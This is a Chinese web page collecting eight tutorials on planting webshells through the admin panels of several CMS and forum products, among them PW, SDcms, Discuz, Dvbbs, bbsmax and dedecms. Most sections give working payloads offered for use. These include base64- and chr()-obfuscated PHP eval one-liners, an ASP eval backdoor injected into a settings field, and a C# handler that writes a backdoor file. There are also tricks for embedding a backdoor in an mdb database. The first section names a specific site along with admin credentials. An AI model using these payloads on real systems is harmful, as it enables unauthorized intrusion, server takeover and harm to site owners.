欢迎来到千学网!
您现在的位置:首页 > 实用文 > 其他范文

教你进后台简单拿webshell

时间:2022-08-25 08:41:14 其他范文 收藏本文 下载本文

下面是小编整理的教你进后台简单拿webshell,本文共8篇,希望能帮助到大家!

教你进后台简单拿webshell

篇1:教你进后台简单拿webshell

今天第二次给菜菜们了!呵呵``````我太NX了`````(开始装B)那次听holy说抓包,我一直没自己作过,今天自己就实践了下,成功了!RP不错!

好了,我们老进后台也没什么意思,我写帖子就写了好几种进后台的方法了,今天给菜菜们做个进了后台,以后通过上传,然后抓包,然后在用明小子综合上传拿shell!

我随便找了个后台,还是以前写帖子找的,这里我给你们用户名和密码吧!

admin appliedtek101.

工具: WSockExpert.exe抓包工具,明小子

打开抓包工具的界面,你会看到什么也没有,然后注意点 左上面那小文件夹图标

,然后出现选择那个iexplore.exe,找到企业后台管理,然后点open,设置如图1

pen以后你将什么也开不到,那就对了,因为你还没上传

找个文章发表的地方,肯定有大家放心,数据库备分肯定没有,那管理员就太```好我找了一个,随便上传了图片,出现如图2,你们如果上传不一定出现啊 ``因为是程序设置的不一样

上传成功```OK!现在我们就去抓包那里看看有没有变化,呵呵``变化是有的```我们应该找到post

我不说了,牵扯到数据包发送,接受还有网络协议等等`````如果你有兴趣自己可以研究下```

POST我们看到底下的内容,POST /upfilea.asp :www.appliedtek.com/uploada.asp,这两个信息是代会我们要上传的地址

这里我大体说下,为什么我们会有两个地址呢,一个uploada和一个upfilea呢!那一个是目录,一个文件,当然用明小子是用的文件了也就是地址!然后就是cookies 复制下来,以后要填写在明小子里

地址:www.appliedtek.com/upfilea.asp

明小子这里有好四个选项,这四个都是大型网站的摸版,上传地址的后缀要跟上面其中一个符合,第一个肯定不行,因为是BBS 所以我们选择第二个,然后设置如

自己选个小马,明小子带的好象不行了

小马的地址就是我在上图标志的那个,用浏览器打开就可以得到如图5的页面,就是上传大马的页面,然后选择大马,把路径就是选择文件保存的绝对路径:D:hostingwwwrootappliedtek_comhtdocsUpload,然后再后面随便写个test.asp 为大马的访问地址!然后上传大马,提示上传成功!

上传后你就得到了shell了,然后输入www.appliedtek.com/Upload/test.asp输入密码进去就可以了!

呵呵```就这么完了```太NX了````

篇2:PW 后台拿WEBSHELL 通用

虽然这算不上什么好东西,但是当你要用他的时候就知道他的重要性了

问题代码我帖一下

――――――――――――-

foreach($content as $key=>$value){

list($w,$r)=explode(”=>”,$value);

$r = trim($r);

$w = explode(”|”,$w);

foreach($w as $k=>$v){

$v = preg_quote(trim($v),’/');

if(!isset($replace[$v]) && !isset($wordsfb[$v])){

$word[] = $v;

$rep[] = $r ? $r : $mrep;

}

}

――――――――――――C

preg_quote这个函数会转义””,但是不转义”‘”

所以会出问题.比如我们提交”‘”会被转义成”’”再经过他一转\’

这样就出问题了

下面是具体的方法了

――――――――――-

直接进入后台修改词语过滤功能:

直接在新增词语中写入下列的语句:

‘,fputs(fopen(base64_decode(”enoucGhw”),”w”),base64_decode(”PD9ldmFsKCRfUE9TVFthXSk7Pz4=”)),’a

另外一个可以随便填写

缺点就是要出错,但是可以拿SHELL

拿了SHELL马上修改回来就没有问题了

上面的会代码会在当前的目录生成一个zz.php,密码是a的一句话

根据自己的需要修改base64_decode函数里面的值就可以了

篇3:SDcms 后台拿webshell

第一种方法:

进入后台-->系统管理-->系统设置-->系统设置->网站名称;

把网站名称内容修改为  “%><%eval request(”xxx“)'   //密码为xxx

用菜刀链接www.xxx.com/inc/const.asp 就搞定了,

第二种方法:

进入后台-->系统管理-->系统设置-->系统设置->上传设置;

在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!

第三种方法:

进入后台-->界面管理-->模板文件管理-->创建文件

文件名写入getshell.ashx

内容写入下面内容:

/====================复制下面的=========================/

<%@ WebHandler Language=”C#“ Class=”Handler“ %>

using System;

using System.Web;

using System.IO;

public class Handler : IHttpHandler {

public void ProcessRequest (HttpContext context) {

context.Response.ContentType = ”text/plain“;

StreamWriter file1= File.CreateText(context.Server.MapPath(”getshell.asp“));

file1.Write(”<%response.clear:execute request(“xxx”):response.End%>“);

file1.Flush;

file1.Close();

}

public bool IsReusable {

get {

return false;

}

}

}

/=============================================/

访问这个地址:www.xxx.com/skins//getshell.ashx

会在www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接

篇4:Discuz后台拿WEBSHELL

我们进入后台后,访问admincp.php?frames=yes&action=members&operation=newsletter

然后发通知,通知内容为:(注意代码换行)

${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}

解密后是:{${phpinfo()}} EXP – (fputs(fopen(‘forumdata/cache/cache_01.php’,'w’),’‘);) :

拿到WEBSHELL

篇5:Dvbbs8.0 access 后台拿webshell for

新建一个数据库文件,命名为a.mdb 新建一个文本文件,命名为b.txt,并写入一句话木马 在命令行下输入命令copy a.mdb/b b.txt/b c.mdb 得到的c.mdb就是已插入一句话木马的数据库 然后在发帖子的地方上传附件,将这个数据库后缀改为RAR 预览帖子,点击附件下

新建一个数据库文件,命名为a.mdb

新建一个文本文件,命名为b.txt,并写入一句话木马

在命令行下输入命令copy a.mdb/b b.txt/b c.mdb

得到的c.mdb就是已插入一句话木马的数据库

然后在发帖子的地方上传附件,将这个数据库后缀改为RAR

预览帖子,点击附件下载,便可以得到上传地址

进入后台,恢复数据库,输入已上传文件的相对路径,在目标文件中一定要写.asp格式

提示恢复成功,成功拿到webshell

8.0:

2003系统:

①采用修改论坛基本设置中的上传目录设定 设置成xxx.asp/ 上传经过数据库合并的ASP木马..改后缀名上传....即可得到Shell

②数据库备份的目录改为/xx.asp/1.mdb

因为DVBBS 8.0..只能备份成mdb的格式....

End if

backpath=server.mappath(backpath)

If Lcase(Mid(backpath,instrRev(backpath,”.“) 1))”mdb“ Then

response.write ”保存数据库名不合法“

Response.End

End If

这里 我们可以把路径改为xxx.asp 比如 xxxx.asp/1.mdb

1.mdb里插入了一句话木马 这样是可以得到shell的

全能空间:上传后缀中加php等.上传后在后台附件管理中找到路径,得到shell.

篇6:Dvbbs8.0 access 后台拿webshell for

新建一个数据库文件,命名为a.mdb

新建一个文本文件,命名为b.txt,并写入一句话木马

在命令行下输入命令copy a.mdb/b+b.txt/b c.mdb

得到的c.mdb就是已插入一句话木马的数据库

然后在发帖子的地方上传附件,将这个数据库后缀改为RAR

预览帖子,点击附件下载,便可以得到上传地址

进入后台,恢复数据库,输入已上传文件的相对路径,在目标文件中一定要写.asp格式

提示恢复成功,成功拿到webshell

8.0:

2003系统:

①采用修改论坛基本设置中的上传目录设定 设置成xxx.asp/ 上传经过数据库合并的ASP木马..改后缀名上传....即可得到Shell

②数据库备份的目录改为/xx.asp/1.mdb

因为DVBBS 8.0..只能备份成mdb的格式....

End if

backpath=server.mappath(backpath)

If Lcase(Mid(backpath,instrRev(backpath,”.“)+1))”mdb“ Then

response.write ”保存数据库名不合法"

Response.End

End If

这里 我们可以把路径改为xxx.asp 比如 xxxx.asp/1.mdb

1.mdb里插入了一句话木马 这样是可以得到shell的

全能空间:上传后缀中加php等.上传后在后台附件管理中找到路径,得到shell.

篇7:bbsmax 4.2.3后台拿Webshell

BBSMAX总体来说是个不错的论坛程序,简洁,强大,不缺乏大气,如果没有这次发现后台拿SHELL,可以说非常的完美。哈哈~但是今天就碰到了BBSMAX后台拿SHELL难题。谷歌也找不到相关内容,最后自己搞了几个小时才拿到shell,所以拿出来分享下。

做一个压缩包文件名为test.zip,里面包含3个文件。分别为:

skin.config

skin.png

1KB.asp(你的小马)

登陆后台,点击“维护”,然后再打开模板管理,

选择导入皮肤,导入我上面所说的test.zip压缩包。但是在这里,你可能没有发现你所打包的1kb.asp文件,这不重要了。哈哈~我们在地址栏直接输入目标站/max-templates/test(压缩包的文件名称)/1kb.asp

最后:

我拿到shell才发现,貌似你可以直接导入一个大马,后缀为ASP的(防止跳到首页)。只是提示出错,但是已经上传成功了。然后直接可以访问ttp://目标站/max-templates/1kb.asp

.哎~拿到shell才发现然来我走了那么多弯路,但是事实希望大家去考证。

作者:HYrz

篇8:dedecms 5.7后台拿WEBSHELL

由于系统自带的文件管理器插件没有过滤文件上传及编辑后保存的文件名,

导致直接写入webshell漏洞,

漏洞测试:

1、进入后台,默认的是dede www.xxxx.com/dede

左边导航栏目,选择模块>辅助插件>文件管理器

(系统默认安装的,如果没有请在插件管理器中自行安装)>然后选择新建文本(或者文件上传)

如上图:文件名称随便填,例如1.php;内容出填写一句话,菜刀连接之,

下面的上传也一样,没有过滤文件扩展名,导致上传任意文件。

三招技巧教你拿高薪

bluecms版本双字节密码进后台漏洞预警

淘客帝国系统后台cookie欺骗漏洞及后台拿shell漏洞预警

教你快速简单处理踝关节扭伤

浅谈变形PHP WEBSHELL检测

记一次WEBSHELL提权

后台朋友短篇散文

教你简单拥有最“Man”的腹肌

网站后台数据分析建议

李宗盛的后台美文摘抄

《教你进后台简单拿webshell(精选8篇).doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

文档为doc格式

点击下载本文文档